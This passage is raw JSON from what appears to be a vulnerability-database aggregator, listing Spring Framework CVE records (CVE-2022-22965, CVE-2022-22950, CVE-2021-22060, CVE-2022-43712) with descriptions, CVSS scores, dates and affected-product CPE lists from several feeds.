{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-09T06:40:09", "id": "VERACODE:34883", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34883/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-06-14T14:38:00", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-01T23:15:00", "type": "debiancve", "title": "CVE-2022-22950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-04-01T23:15:00", "id": "DEBIANCVE:CVE-2022-22950", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-14T14:38:00", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "debiancve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T23:15:00", "id": "DEBIANCVE:CVE-2022-22965", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:14:10", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-10T14:10:00", "type": "debiancve", "title": "CVE-2021-22060", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2022-01-10T14:10:00", "id": "DEBIANCVE:CVE-2021-22060", "href": "https://security-tracker.debian.org/tracker/CVE-2021-22060", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-08-15T15:52:11", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-01T23:15:00", "type": "prion", "title": "CVE-2022-22950", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-06-22T13:53:00", "id": "PRION:CVE-2022-22950", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-08-15T15:52:18", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "prion", "title": "CVE-2022-22965", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-09T02:07:00", "id": "PRION:CVE-2022-22965", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T01:11:15", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-10T14:10:00", "type": "prion", "title": "CVE-2021-22060", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2022-05-13T15:52:00", "id": "PRION:CVE-2021-22060", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-22060", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-08-15T22:27:17", "description": "POST requests to /web/mvc in GX Software XperienCentral version 10.36.0 and earlier were not blocked for uses that are not logged in. If an unauthorized user is able to bypass other security filters they are able to post unauthorized data to the server because of CVE-2022-22965.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-07-26T14:15:00", "type": "prion", "title": "CVE-2022-43712", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-43712"], "modified": "2023-08-04T19:39:00", "id": "PRION:CVE-2022-43712", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-43712", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-06-14T14:26:44", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-01T23:15:00", "type": "cve", "title": "CVE-2022-22950", "cwe": ["CWE-770"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-06-22T13:53:00", "cpe": [], "id": "CVE-2022-22950", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-06-14T14:26:53", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "cve", "title": "CVE-2022-22965", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-09T02:07:00", "cpe": ["cpe:/a:oracle:communications_cloud_native_core_console:22.1.0", "cpe:/a:veritas:access_appliance:7.4.3.100", "cpe:/a:siemens:sipass_integrated:2.85", "cpe:/a:veritas:flex_appliance:2.0", "cpe:/a:oracle:sd-wan_edge:9.1", "cpe:/h:veritas:netbackup_appliance:4.1", "cpe:/a:veritas:netbackup_flex_scale_appliance:2.1", "cpe:/a:oracle:sd-wan_edge:9.0", "cpe:/a:oracle:financial_services_enterprise_case_management:8.1.1.1", "cpe:/a:oracle:commerce_platform:11.3.2", "cpe:/a:oracle:communications_cloud_native_core_binding_support_function:22.1.3", "cpe:/a:oracle:communications_cloud_native_core_network_repository_function:1.15.0", "cpe:/a:oracle:financial_services_enterprise_case_management:8.1.2.0", "cpe:/a:oracle:weblogic_server:14.1.1.0.0", "cpe:/a:oracle:retail_bulk_data_integration:16.0.3", "cpe:/a:oracle:retail_merchandising_system:19.0.1", "cpe:/a:oracle:retail_financial_integration:19.0.1", "cpe:/a:oracle:communications_cloud_native_core_policy:22.1.0", "cpe:/a:veritas:flex_appliance:1.3", "cpe:/a:veritas:access_appliance:7.4.3", "cpe:/a:oracle:communications_cloud_native_core_network_exposure_function:22.1.0", "cpe:/h:veritas:netbackup_virtual_appliance:4.0.0.1", "cpe:/h:veritas:netbackup_virtual_appliance:4.1", "cpe:/h:veritas:netbackup_appliance:4.0", "cpe:/h:veritas:netbackup_appliance:4.0.0.1", "cpe:/a:oracle:retail_financial_integration:16.0.3", "cpe:/a:oracle:retail_merchandising_system:16.0.3", "cpe:/a:veritas:flex_appliance:2.0.1", "cpe:/a:oracle:retail_integration_bus:16.0.3", "cpe:/h:veritas:netbackup_virtual_appliance:4.1.0.1", "cpe:/a:siemens:siveillance_identity:1.5", "cpe:/a:oracle:retail_xstore_point_of_service:21.0.0", "cpe:/a:oracle:financial_services_behavior_detection_platform:8.1.2.0", "cpe:/a:oracle:retail_integration_bus:15.0.3.1", "cpe:/a:oracle:communications_unified_inventory_management:7.4.1", "cpe:/a:oracle:communications_cloud_native_core_unified_data_repository:22.1.0", "cpe:/a:oracle:communications_cloud_native_core_network_repository_function:22.1.0", "cpe:/a:oracle:communications_cloud_native_core_automated_test_suite:1.9.0", "cpe:/a:oracle:retail_xstore_point_of_service:20.0.1", "cpe:/a:oracle:communications_cloud_native_core_network_slice_selection_function:1.8.0", "cpe:/h:veritas:netbackup_virtual_appliance:4.0", "cpe:/a:oracle:retail_customer_management_and_segmentation_foundation:17.0", "cpe:/a:oracle:retail_customer_management_and_segmentation_foundation:18.0", "cpe:/a:oracle:retail_integration_bus:14.1.3.2", "cpe:/a:oracle:communications_cloud_native_core_automated_test_suite:22.1.0", "cpe:/a:oracle:financial_services_behavior_detection_platform:8.1.1.1", "cpe:/a:oracle:communications_cloud_native_core_network_slice_selection_function:1.15.0", "cpe:/a:oracle:retail_financial_integration:14.1.3.2", "cpe:/a:oracle:communications_unified_inventory_management:7.5.0", "cpe:/a:oracle:communications_cloud_native_core_console:1.9.0", "cpe:/a:oracle:product_lifecycle_analytics:3.6.1", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.0", "cpe:/a:veritas:flex_appliance:2.0.2", "cpe:/a:oracle:communications_cloud_native_core_security_edge_protection_proxy:22.1.0", "cpe:/a:oracle:communications_unified_inventory_management:7.4.2", "cpe:/a:oracle:communications_cloud_native_core_security_edge_protection_proxy:1.7.0", "cpe:/a:veritas:netbackup_flex_scale_appliance:3.0", "cpe:/a:veritas:flex_appliance:2.1", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.1.1", "cpe:/a:oracle:communications_cloud_native_core_unified_data_repository:1.15.0", "cpe:/a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0", "cpe:/h:veritas:netbackup_appliance:4.1.0.1", "cpe:/a:oracle:retail_customer_management_and_segmentation_foundation:19.0", "cpe:/a:oracle:retail_financial_integration:15.0.3.1", "cpe:/a:oracle:retail_integration_bus:19.0.1", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:financial_services_behavior_detection_platform:8.1.1.0", "cpe:/a:oracle:financial_services_enterprise_case_management:8.1.1.0", "cpe:/a:oracle:communications_policy_management:12.6.0.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0", "cpe:/a:oracle:communications_cloud_native_core_network_slice_selection_function:22.1.0", "cpe:/a:oracle:communications_cloud_native_core_policy:1.15.0", "cpe:/a:siemens:sipass_integrated:2.80", "cpe:/a:veritas:access_appliance:7.4.3.200", "cpe:/a:siemens:siveillance_identity:1.6"], "id": "CVE-2022-22965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:sd-wan_edge:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_console:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.1.0.1:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:veritas:flex_appliance:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_bulk_data_integration:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:19.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:access_appliance:7.4.3:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.1.0.1:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.0.0.1:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.1.0.1:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.1.0.1:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_exposure_function:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:19.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:netbackup_flex_scale_appliance:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:15.0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.0.0.1:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.0.0.1:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:netbackup_flex_scale_appliance:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_policy:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:21.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:flex_appliance:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:flex_appliance:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:flex_appliance:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:19.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:sd-wan_edge:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:access_appliance:7.4.3.100:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.0.0.1:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_appliance:4.0.0.1:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.0.0.1:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:commerce_platform:11.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_policy_management:12.6.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:flex_appliance:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:22.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:product_lifecycle_analytics:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:veritas:access_appliance:7.4.3.200:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:20.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.1.1.1:*:*:*:*:*:*:*", "cpe:2.3:h:veritas:netbackup_virtual_appliance:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:22.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.15.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:22:03", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-10T14:10:00", "type": "cve", "title": "CVE-2021-22060", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2022-05-13T15:52:00", "cpe": ["cpe:/a:vmware:spring_framework:5.2.18", 